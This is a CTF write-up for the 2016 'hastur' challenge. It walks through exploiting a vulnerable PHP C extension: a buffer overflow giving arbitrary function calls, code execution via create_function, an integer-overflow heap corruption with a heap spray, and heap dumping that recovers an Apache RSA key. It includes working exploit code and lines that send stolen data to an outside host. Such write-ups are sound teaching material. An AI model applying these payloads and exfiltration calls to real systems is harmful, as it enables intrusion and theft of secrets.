hastur was a web/pwnable/forensics, but really actually pwnable challenge in Tokyo Westerns/MMA CTF 2016. It had three stages with three different flags, with a combined point value of 850.

It consisted of a PHP application that had parts of it unnecessarily implemented as C extensions. When we started the challenge, we had the source code of the PHP extension available as a hint.

Apart from the hastur PHP extension, there is also an Apache module loaded called mod_flag.so, which basically at Apache startup reads the files /flag1 and /flag2 and puts them into global buffer. Nothing interesting here other than the file names we might need later.

Stage 1: Exploiting a trivial global buffer overflow to call “any” PHP function

The hastur extension defines two global buffers:

static char handler[32]; // = "hastur_ia_ia_handler";
static char god_name[32]; // = "Hastur";

The handler buffer is set to a constant value during extension activation, the second one is user-controlled via a POST parameter. By looking at the compiled module, we can see that the order of the variables in the .bss section is swapped, i.e. god_name precedes handler. And sure enough, we can overflow god_name via a simple strcpy:

static PHP_FUNCTION(hastur_set_name)   // <- this is called with $_POST['name']
    char *str;
    int str_len;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {

    strncpy(god_name, str, str_len + 1);  // <-  does not check dest bounds :)

Ok, so we can set the handler to an arbitrary value. Now this comes in handy when the following code is executed:

static PHP_FUNCTION(hastur_ia_ia)
    // .....
    ZVAL_STRING(handler_zval, handler, 1);
    ZVAL_STRING(name_zval, god_name, 1);
    params[0] = &text_zval;
    params[1] = &name_zval;

    // note: fill text value argument to hastur_ia_ia
    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &text, &text_len) == FAILURE) {

    // ... text is transformed in an uninteresting way

    // note: This is basically call_user_function(handler, text, god_name)
    if (call_user_function_ex(EG(function_table), NULL, handler_zval,
                              &retval_ptr, 2, params, 0, NULL TSRMLS_CC) == SUCCESS) {
        // ...
    // ...

So our overwritten handler string is used as a function name and called with two arguments. We verify this is a Bad Thing™ by calling printf via the following POST parameters:


And sure enough, the string “foo” appears in the response. Now what? After some fiddling we figured out that we can read files with highlight_file:


But for some reason we could not read /flag1 this way, which is weird. We did not investigate this further because we wanted proper code execution anyways. The payload we used to do that is the following:

name=}echo 1;#aaaaaaaaaaaaaaaaaaaaaaacreate_function&text=

Basically this results in a call to create_function('', '}echo 1;#aaa...') and broken as PHP is, this of course is equivalent to eval('echo 1;')… Apparently create_function is implemented via eval by just creating a function definition on the fly via string concatenation. So now we can do

x=echo 1;

And execute arbitrary PHP code. And for some reason we can now use echo file_get_contents('/flag1'); to read the /flag1. Milestone completed.

Stage 2: Exploiting a PHP heap buffer overflow with large buffers

One thing to note is that we can also read /proc/self/maps, so we know where the flag is located. Plus, with the /proc/self/maps leak, it is easy to allocate a buffer whose (approximate) location we know:

$payload = str_repeat('a', 1<<26);
echo file_get_contents('/proc/self/maps');


565e4000-5666f000 r-xp 00000000 08:01 401642                             /usr/sbin/apache2
5666f000-56671000 r--p 0008b000 08:01 401642                             /usr/sbin/apache2
56671000-56673000 rw-p 0008d000 08:01 401642                             /usr/sbin/apache2
56673000-56676000 rw-p 00000000 00:00 0
58133000-58170000 rw-p 00000000 00:00 0                                  [heap]
58170000-582dc000 rw-p 00000000 00:00 0                                  [heap]
582dc000-58304000 rw-p 00000000 00:00 0                                  [heap]
f1b09000-f5b4a000 rw-p 00000000 00:00 0   <- this block was not there before
f5b4a000-f639b000 r-xp 00000000 08:01 531683                             /usr/lib/apache2/modules/libphp5.so
f639b000-f63fc000 r--p 00850000 08:01 531683                             /usr/lib/apache2/modules/libphp5.so
f73a7000-f73a8000 r-xp 00000000 08:01 271437                             /usr/lib/apache2/modules/mod_flag.so
f73a8000-f73a9000 r--p 00000000 08:01 271437                             /usr/lib/apache2/modules/mod_flag.so
f73a9000-f73aa000 rw-p 00001000 08:01 271437                             /usr/lib/apache2/modules/mod_flag.so
f73aa000-f73ac000 rw-p 00000000 00:00 0

So we know that our block is allocated in the region starting at 0xf1b09000, and we know the flag 2 is at 0xf73a7000 + 0x2080 (the offset can be found with a disassembler). Our idea now is to fake a string ZVal inside the big $payload string. Later we will exploit the extension module by overwriting a heap buffer to point to that ZVal, in a way that we can read it after. Because we didn’t want to fix offsets all the time, we did a proper heap spray:

for ($i = 0; $i < (1<<26); $i += 0x1000) {
  // value.str.val = address of flag2
  $payload[$i] = "\x80";
  $payload[$i+1] = "\x90";
  $payload[$i+2] = "\x3a";
  $payload[$i+3] = "\xf7";

  // value.str.len
  $payload[$i+4] = "\x40";
  $payload[$i+5] = "\0";
  $payload[$i+6] = "\0";
  $payload[$i+7] = "\0";

  // refcount__gc
  $payload[$i+8] = "\1";
  $payload[$i+9] = "\0";
  $payload[$i+10] = "\0";
  $payload[$i+11] = "\0";

  // type
  $payload[$i+12] = "\x06";
  // reference flag
  $payload[$i+13] = "\0";
  $payload[$i+14] = "\0";
  $payload[$i+15] = "\0";

The fake ZVal is repeated on the beginning of every page, so with more or less 100% reliability now, the will be a copy of it at 0xf3011018 (just a random adress in that range without null bytes).

Enough preparation, where is the actual bug? Well there is only one function left in the hastur extension, hastur_ia_ia_handler, so we figured it would be in there. This function is called with two parameters, $text and $name, and it replaces every occurrence of a dot in $text with the sequence ". ia! ia! $name!". Not very sensible, and sure enough vulnerable:

// Note: sizeof(extra) is 1024
snprintf(extra, sizeof(extra), " ia! ia! %s!", name);
// Note: extra_len is at most 1023, because extra has a leading null-byte
extra_len = strlen(extra);

// Note: compute new length
size_t new_len = 0;
char *p = text;
while (*p) {
    if (*p++ == '.')
        new_len += extra_len;

// Note: Allocate result buffer and do the work
char *ns = emalloc(new_len + 1);
p = ns;
for (i = 0; i < text_len; i++) {
    *p++ = text[i];
    if (text[i] == '.') {
        strncpy(p, extra, extra_len);
        p += extra_len;
*p = '\0';

The code creates the replacement sequence " ia! ia! $name!" first, in a stack buffer, then computes the final length of the result, then allocates a buffer and computes the result. However, when computing the final length, it does not check for overflows. So if we use the maximum extra_len of 1023 (e.g. by passing in the name "a"*1024), and text is set to exactly 222 dot characters, then the result size will be 2^22 * (1023 + 1) = 0 (mod 2^32), and the extension will allocate a one-byte buffer, which is slightly too small.

Now the problem is that even though we get an enormous heap corruption, the program will not likely survive, because the loop after the allocation will try to write 232 bytes, and trigger a page fault pretty quickly. So our idea is to have the text buffer after the allocated buffer in the heap, and overwrite itself with non-dots, so that the overwrite is stopped shortly beyond the text buffer.

We also want to overwrite something useful, so the idea is to place something between destination and text buffer which contains pointers to ZVals.

We realized we could not use the size values from above (with destination size = 1), because the small destination buffer will be allocated in a different heap than the large text buffer. So we played with the values a bit and finally used extra_len = 512 (i.e. name = "a"*502) and a text with 2^23 - 1 dots and 513 non-dot (payload) characters. The destination size is then computed as (2^23 - 1)*513 + 513 + 1 = 2^23 + 1 (mod 2^32), so it has about the same size as the text buffer. And sure enough, they are both allocated in the same heap, with a predictable offset from each other (at least on the exact combination of operating system and PHP version that the contest used).

On a side note, we used a hack of tsuro’s simple heap tracing GDB script to trace the allocations. Thanks tsuro!

As for the victim buffer, we needed something large which contains pointers. After some search, we decided to use SplFixedArray. It’s perfect for our purpose because it has a predictable size (4 * number of elements), is preallocated as one single chunk, and is basically just an array of pointers of ZVals. So this is how our final layout looks like:

$name = str_repeat('a', 502);

// number of non-dot characters
$n = 513;
$text = str_repeat('.', (1<<23) - ($n / 513) + $n);

for ($i = 16871; $i < 16871 + 25; ++$i)
  $text[$i] = 'a';

// reliable pointer to our fake ZVal
$text[16871 + 25] ="\x18";
$text[16871 + 26] ="\x10";
$text[16871 + 27] ="\x01";
$text[16871 + 28] ="\xf3";
$i += 4;

for (;$i < 16871 + 513; ++$i)
  $text[$i] = 'a';

// allocated size = 1<<23
$victim = new SplFixedArray(1<<21);

The text, victim and later the destination buffer will be allocated from top to bottom in the heap, so we will have the desired order

[destination] [victim] [text]

The offset 16871 and padding of 25 bytes is carefully chosen so that we overwrite the beginning of the victim buffer with our fake pointer. We will overwrite some bytes (at most 512) past the end of the text buffer (and other stuff in between the buffers), but apparently there is nothing really important in this heap, so that is not a problem. Time for some action:

hastur_ia_ia_handler($text, $name);
echo $victim[0];

Now this will not work, because PHP will crash on shutdown while trying to deallocate the $victim array and all of its members (some of which are just pointers to 0x61616161). But that’s not a problem, we can get the data out before shutdown:

file_get_contents('https://kitctf.de/win/'. urlencode($data));

And sure enough: - - [05/Sep/2016:12:25:38 +0200] "GET /win/TWCTF%7Bd315e24abcc494289a9d6df422e77f67c6476e24_dump_dump_dump%7D%0A%00 HTTP/1.0" 404 541 "-" "-"

Check our Github to look at the complete final exploit.

Flag 3: Dump, Dump, Dump

For flag 3, we had a PCAP with an SSL-encrypted connection to port 31179 on the same server. Presumably it would contain the flag. So our idea was to execute our exploit against the SSL-enabled server and dump all of its heap memory, looking for RSA keys. So we adapted our exploit to send the data back via a POST request:

$options = [
    'http' => [
        'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
        'method'  => 'POST',
        'content' => http_build_query(['x' => $victim[0]])
$context  = stream_context_create($options);
$result = file_get_contents('http://kitctf.de:4444/', false, $context);

And used it to dump three memory regions tagged with [heap]. First we tried grepping for the string BEGIN RSA PRIVATE KEY, but no such luck. Next we found a utility called passe-partout which can extract RSA keys from Apache memory via ptrace. Of course this is not directly applicable in our scenario, but we modified it to read the memory from files and ran it over our dumps. And it found us the key:

root@ubu1404:/ctf/tokyo/hastur/dump# ls
1  2  3
root@ubu1404:/ctf/tokyo/hastur/dump# ../apache-ssl-key-extract/passe-partout
found RSA key @ 0x5775eee8
[X] Key saved to file id_rsa-0.key
root@ubu1404:/ctf/tokyo/hastur/dump# cat id_rsa-0.key

Note that we built and ran it on the same OS as the contest was using to run Apache, in order to have the same struct definitions as Apache. From here it is easy to decrypt the SSL stream using Wireshark:

GET /flag3 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: hastur.chal.ctf.westerns.tokyo:31179
Accept: */*

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2016 15:46:05 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Wed, 31 Aug 2016 15:45:47 GMT
ETag: "30-53b5ffdac8851"
Accept-Ranges: bytes
Content-Length: 48